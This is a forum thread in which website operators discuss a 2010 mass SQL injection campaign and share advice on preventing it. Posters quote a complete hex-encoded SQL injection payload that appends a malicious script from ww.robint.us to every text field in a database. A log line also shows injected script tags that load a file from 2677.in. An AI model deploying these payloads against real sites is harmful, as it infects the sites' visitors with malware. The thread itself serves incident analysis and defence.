A bunch of IIS sites got hacked with a javascript malware pointing to ww.robint.us/u.js.
Google cache says more than 1,000,000 different pages got affected:
http://www.google.com/#hl=en&source=hp&q=http%3A%2F%2Fww.robint.us%2Fu.js
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
My question is: Did anyone here got hacked with that and still have any logs (or network dump) available for analysis? If you do, have you spotted anything interesting in there?
Sites as big as wsj.com got hacked and some people are saying that maybe a zero-day on IIS/ASP.net is in the wild...
-
We got hit through some old classic asp pages two days ago.
The attack looks like it appends the following to query parameters:
;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420612E6E416D452C622E6E416D452046724F6D207359734F624A6543745320612C735973436F4C754D6E53206220774865526520612E69443D622E694420416E4420612E78547950653D27752720416E442028622E78547950653D3939206F5220622E78547950653D3335206F5220622E78547950653D323331206F5220622E78547950653D31363729206F50654E207441624C655F637572736F52206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C4063207768696C6528404066457443685F7374617475733D302920624567496E20657865632827557044615465205B272B40742B275D20734574205B272B40632B275D3D727472696D28636F6E7665727428766172636861722838303030292C5B272B40632B275D29292B63417354283078334337333633373236393730373432303733373236333344363837343734373033413246324637373737324537323646363236393645373432453735373332463735324536413733334533433246373336333732363937303734334520615320764172436841722835312929207768657265205B272B40632B275D206E6F74206C696B6520272725726F62696E742527272729206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C406320654E6420634C6F5365207441624C655F637572736F52206445416C4C6F43615465207441624C655F637572736F523B2D2D%20eXEc(@s)--
It appends the script to all text fields in the database. I don't think it has anything special to do with IIS/ASP.
Kind regards Claus
From Claus Pedersen -
I got hit with it too. Just a sql injection, that loads a trojan / sessionjacking js.
Also, that is not a proper search query for finding all affected sites.
"http: //ww.robint.us/u.js" <> http: //ww.robint.us/u.js(don't visit!)From Shawn -
decoded here http://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.html
-
I got this on several of my websites too... what is the appropriate fix to prevent this from happening again?
Shawn : use sqlparameters with your sqlcommands instead of concatenating stringsFrom Kris -
We got under heavy sql injection attack today looking like this:
[06-11-2010 - 11:36:52] Client at 67.195.110.177: URL length exceeded maximum allowed. Request will be rejected. Site Instance='1721918753', URL='/casas-ferias/1397/Benajarafe%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677.in%%2Fyahoo.js%%3E%%3C%%2Fscript%%3E/6/Malaga%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677.in%%2Fyahoo.js%%3E%%3C%%2Fscript%%3E/0/Andaluzia/Benajarafe%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677%%2Ein%%2Fyahoo%%2Ejs%%3E%%3C%%2Fscript%%3E.html'
The source ip is actually Yahoo crawler ip's, so it looks like someone has published sql injection links on some third party website and then Yahoo follows them blindly so the attack is actually coming "from yahoo" even though the don't know about this.
They also use a yahoo.js file to make it look even more yahoo'ish, but the domain is 2677.in (and probably others).
Really clever way to get a "robot network" to do the hard work.
Kris, as shawn says you should use SqlParameters. You can use Microsoft UrlScan 3.1 to protect you - but you should also make sure that your code isn't vulnerable.
From Claus Pedersen -
Here's a very detailed analysis: http://blog.armorize.com/2010/06/recent-evolution-of-mass-sql-injection.html
From Wayne
0 comments:
Post a Comment